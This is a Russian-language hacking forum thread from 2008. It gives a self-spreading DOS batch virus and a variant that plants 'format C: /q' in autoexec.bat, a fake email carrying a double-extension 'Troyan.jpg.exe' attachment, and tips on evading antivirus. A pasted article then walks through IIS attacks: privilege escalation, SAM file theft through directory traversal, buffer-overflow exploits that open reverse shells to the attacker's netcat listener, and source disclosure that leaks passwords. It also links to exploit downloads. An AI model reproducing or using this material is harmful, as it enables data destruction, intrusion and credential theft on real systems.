@Echo off
copy %0 c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
copy %0 a:run.bat >nul

Пишем это в блокноте меняем разриение на .bat и пишем на дискету и у нас есть самый простой тупой вирус можно приписать к нему ооооооооооооооооочень много функций этот можно так сказать безобиден =)
например очень хорошую

@Echo off
Echo format C: /q >> c:Autoexec.bat

нечего особенного но мне этот атрибут жуть как нравиться

Так же пинг с большим отрицательным количиством пакетов вводит компьютер в ступор или вешает (Это для тех кто не знает) так же

From: J <Jocker-pizdec@ki.net>
To: <cergach.ucoz.ru>
Subject: !!!!!Poluchai gad troyana!!!!
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="Troyan.jpg.exe”
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAgAAAAA
4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC
BiZSBydW4gaW4gRE9TIG1 vZGUuDQ0KJAAAAAAAAAB
QRQAATAEDAGVj+zwAAAAAAAAAAOAADwELAQED
ABAAAAAQAAAAYAAA4HkAAABwAAAAgAAAAABAAA
AQAAAAAgAAAQAAAAAAAAAEAAAAAAAAAACQAAAA
E AAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAA
ABAAAAAAAAAAAAAAAKSDAAB0AQAAAIAAAKQDAA
AAAAAAAAAAAAAAAAAAААА

--====_ABC1234567890DEF_====

-- ====_ABC1234567890DEF_====--

Это осталось только скомпилировать и засунуть в комп что не составит труда так же можно это дело обработать кодировщиком который недаёт распознавать вирус антивирусом...

Компьютерный вирус — это фрагмент исполняемого кода, который копирует себя в другую программу, модифицируя ее при этом.

Здесь стоит отметить, что, в первую очередь, это обычная программа, прав да, предназначенная не для удовлетворения потребностей пользователя, а наоборот, призванная уничтожить ценную информацию, испортить "досуг" различными сбоями операционной системы и программного обеспечения, нанести материальный ущерб и т. п.

Наиболее характерные черты компьютерных вирусов:

* самостоятельное копирование из каталога в каталог или из файла в файл, что обычно называется "самовоспроизведением". Это позволяет вирусам выживать в условиях постоянной смены программного обеспечения (за раженную программу пользователь может удалить и на этом "жизнь" ви руса закончится). Тем более, что наличие копии вируса в каждой папке повышает шанс его копирования на другой компьютер;
* маскировка под полезные программы или режим невидимости, при кото ром вы даже не подозреваете, что компьютер заражен (при нажатии ком бинации клавиш < CTRL >+< ALT >+< DEL > запущенные вирусом файлы не отображаются).

Естественно, что не все программы, которые самостоятельно копируют некоторые файлы в различные каталоги и создают видимость, что ничего не происходит, можно считать компьютерными вирусами.

Существует несколько критериев, позволяющих классифицировать компью терные вирусы, — это поддерживаемая операционная система, способ зара жения, алгоритмы работы, деструктивные возможности.

По операционным системам компьютерные вирусы можно подразделить на:

* вирусы, работающие в среде MS - DOS , — весьма устаревшая категория вирусов, которая еще может в отдельных случаях быть опасной, напри мер для Windows 9 x или MS - DOS , но в операционных системах Windows NT они просто не могут быть запущены по вполне естествен ным причинам;
* вирусы, работающие в среде Windows 9 x , — наиболее широко распро страненная категория вирусов, по сей день представляющая большую опасность;
* вирусы, работающие в среде Windows NT , — наиболее "продвинутые" ви русы, т. к. некоторые особенности работы операционных систем данного семейства по своей сути сами по себе защищают компьютер от воздейст вия вирусов, например блокируется прямой доступ к управлению аппа ратными ресурсами.

Ещё можно заставить Paint проигрывать видео страшная штука (Для тех кто незнает )

Добавлено (15.03.2008, 00:37)
---------------------------------------------
РАСШИРЕНИЕ ПРИВЕЛЕГИЙ Мы работаем в контексте гостевой учетной записи (IUSR_имя_машины или IWAM_имя машины). Для IIS 4 есть утилита hk.exe, которая использует LPC (Local Procedure Call), которая в свою очередь работает в контексте системной учетной записи. С ее помощью можно выполнять любые команды, в т.ч. и добавить себя в группу администраторов (я уже не говорю о дефейсе): hk.exe net localgroup administrators IUSR_имя_машины /add (возможно и так: hk.exe net localgroup administrators /add IUSR_имя_машины) Качаем ее отсюда: http://packetstormsecurity.nl/0101-exploits/hk-0.1.zip Для IIS 5 эта штука не годится. Для win2k нужно брать iis5crack.dll, которая использует функцию RevertToSelf (эта функция может приводить к выполнению команд в контексте системной учетной записи, запрашивая текущий поток перейти из IUSR в SYSTEM). Достаточно ее загрузить на сервер с именем одной из dll'ок, которым разрешена эта функция: idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll author.dll admin.dll shtml.dll Затем запускаем ее в окне броузера и можем опять-таки выполнять команды с правами system… Найти исходники и готовую dll можно здесь: http://www.digitaloffense.net/iiscrack/ Есть еще одна очень интересная программка, которая использует те же dll. Это iscp. Что бы получить административный доступ к серверу с ее помощью, нужно скопировать, скажем idq.dll, в каталог, например scripts. После этого: C:>iscp www.microsoft.net/scripts/ idq.dll 80 Далее нужно будет пару раз нажать ENTER, когда нас попросят. Вот мы и стали админом =) В принципе, мы забыли сказать еще об одном стандартном приеме получения привелегий. Скорее всего, это первое, что нужно было бы проверить на дырявом сервере. Файл паролей НТ - sam. Иногда его можно скопировать в веб папку и потом скачать. Вернее, скопировать можно не его самого, а системный бекап, хранящийся в папке winnt/repair. Для НТ 4 это sam._, а для win2k просто sam. Пробуем скопировать: http://www.microsoft.net/scripts/..%255c../cmd1.exe?/c+copy+c:winnt epairsam+c:winntwwwroot Затем просто скачиваем его: http://www.microsoft.net/sam и расшифровываем при помощи LC (L0phtCrack). ЧАСТЬ 2. ПАРА СТАРЫХ УЯЗВИМОСТЕЙ.

Добавлено (15.03.2008, 00:37)
---------------------------------------------
Одна из нашумевших в свое время уязвимостей - IDQ .Printer Overflow, использовавшаяся червем codered. Суть найденной eEye Digital Security уязвимости заключается в переполнении буфера в фильтре ISAPI при передаче в HTTP запросе к файлу с расширением .printer более 420 символов в поле HOST. Самое интересное, что необязательно делать запрос к реальносуществующему файлу. В протоколе интернет печати (IPP), отвечающая за это dll, вызывает до проверки существования файла. GET /NULL.printer HTTP/1.0 HOST: [420 символов] Такой запрос при нормальных условиях подвесит IIS, но win2k автоматом ее перезапускает, т.ч. для пользователя визуально ничего не будет заметно (если только хакер не добивается отказа в обслуживании). Эксплоит, написанный eEye компилится с ошибками (вот скомпиленный: http://packetstormsecurity.nl/9906-exploits/iishack.exe ). Первый реальный эксплоит под nix назывался jill, который используя переполнение буфера в IPP, создает обратный шелл на адрес хакера в контексе записи SYSTEM. Работает это все так: nc -vv -l -p 31337 listening on [any] 31337 ... Теперь запускаем jill: jill IP_адрес_жертвы 80 наш_IP 31337 iis5 spyrit / beavuh labs. Connecting... Sent... Если все прошло нормально, получаем у себя в окне nc: listening on [any] 31337 connect to [наш_IP] from MICROSOFTIISHACKED [IP_адрес_жертвы] 1117 [жмем ENTER] Microsoft Windows 2000 [Version 5.0.0.2195] c Copyright 1985-1999 Microsoft Corp. C:> Иногда прийдется лишний раз нажимать ENTER - это нормально. Под win32 этот эксплоит был портирован с именем juill-win32. Позже в сети появилась модифицированная версия iis5hack и iishack2000 (под win32):

Добавлено (15.03.2008, 00:37)
---------------------------------------------
http://packetstormsecurity.nl/0105-exploits/iishack2000.c. Серия уязвимостей в ISAPI DLL, раскрывающих исходный код. Классическая уязвимость +.htr, работающая как на IIS 4, так и на IIS 5. Добавление +.htr к файлу показывает его исходный код, даже если файл исполняемый (скрипт .asp, .php И т.п.). Например, можно вызвать файл global.asa, который никогда не передается клиенту: GET /site1/global.asa+.htr HTTP/1.0 [CRLF] [CRLF] Через netcat, подключенную к уязвимому серверу, результат будет такой: C:> nc -vv www.victim.com 80 www.victim.com [10.15.1.10] 80 (http) open HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 25 Jan 2001 00:50:17 GMT ("Profiles_ConnectString") = "DSN=profiles;UID=Company_user;Password=secret" ("DB_ConnectString") = "DSN=db;UID=Company_user;Password=secret" ("PHFConnectionString") = "DSN=phf;UID=sa;PWD=" ("SiteSearchConnectionString") = "DSN=SiteSearch;UID=Company_user;PWD=simple" ("ConnectionString") = "DSN=Company;UID=Company_user;PWD=guessme" ("eMail_pwd") = "sendaemon" ("LDAPServer") = "LDAP://directory.company.com:389" ("LDAPUserID") = "cn=Directory Admin" ("LDAPPwd") = "slapdme" Как видите, из этого файла можно многое почерпнуть =) HTR Chunked Encoding Buffer overflow Не очень старая уязвимость. Эксплоит называется HTR_Exploit.pl (или iischeck.pl). Работает даже под IIS 5.1 (Win XP Pro). Пока это только доказательство концепции. :: БЕГЛЫЕ ЗАМЕЧАНИЯ :: Мы не касаемся некоторых уязвимостей как .ida, .idq, .htw и проч. Вот пара эксплоитов для полноты картины: http://packetstorm.linuxsecurity.com/0001-exploits/iiscat.c http://www.digitaloffense.net/ida_overflow.pl Если передать shtml.exe в качестве параметра несуществующее имя файла, узнаем путь к wwwroot: http://207.69.190.42/_vti_bin/shtml.exe/postinfo1.html Cannot open "d:inetpubwwwrootpostinfo1.html": no such file or folder. В IIS 4 при подстановке ::$DATA после имени .asp файла получим его исходный код. Можно зааплодить троян на IIS 4 без SP6:

Добавлено (15.03.2008, 00:37)
---------------------------------------------
http://packetstorm.linuxsecurity.com/trojans/Hackyou.tgz ЧАСТЬ 3. УЯЗВИМОСТЬ IIS WebDAV NTDLL.DLL И вот, новые уязвимости прогремели с шумом по сети. переполнение буфера в протоколе webdav под IIS позволяет выполнять произвольный код в контексте учетной записи SYSTEM. Утилита для проверки сервера на эту уязвимость: http://packetstormsecurity.nl/NT/audit/PTwebdav.zip Первый эксплоит сделал kralor [Crpt]. Он открывает обратную связь, используя netcat. http://www.gipshack.ru/expl/wbr.c Сперва запускаем nc: nc -L -vv -p 31337 Затем запускаем эксплоит: wbr адрес_жертвы наш_ip 31337 0 После этого появился более продвинутый эксплоит от www.rs-labs.com: http://www.rs-labs.com/exploitsntools/rs_iis.c Работает так: $ gcc -o rs_iis rs_iis.c $ ./rs_iis microsoft.net Resolving hostname ...
# Attacking port 80 at roman (EIP = 0x00480004)...
# Now open another console/shell and try to connect (telnet) to victim port 31337... $ telnet roman 31337 Trying 192.255.255.1 ... Connected to microsoft.net. Escape character is '^]'. Microsoft Windows 2000 [Version 5.00.2195] © Copyright 1985-2000 Microsoft Corp. C:WINNTsystem32> Авторы xSpider сканера сделали эксплоит с графическим интерфейсом под win32: http://www.ptsecurity.ru/tools/PTwebdav.zip И, кажется, самый свежий на момент написания статьи - от Xnuxer Lab. Сплоит примечателен тем, что не требует дополнительных средств типа netcat. Код см.здесь: http://gipshack.ru/expl/webdav3.html ДРУГИЕ ЭКСПЛОИТЫ: http://www.digitaloffense.net/webdav_ex.pl Использование: webdav_ex.pl -h -p -H -P -R http://gipshack.ru/expl/iiswebdav.txt Эксплоит от Alumni. Биндит шелл на порту 32768. Под линукс: http://packetstormsecurity.nl/0306-exploits/linux-wb.c Все основные эксплоиты можно найти здесь: http://gipshack.ru/search/?query=webdav

Добавлено (15.03.2008, 00:38)
---------------------------------------------
Ну че,кто поверил,что и Я умный???Я так не думаю,jocker может быть кем угодно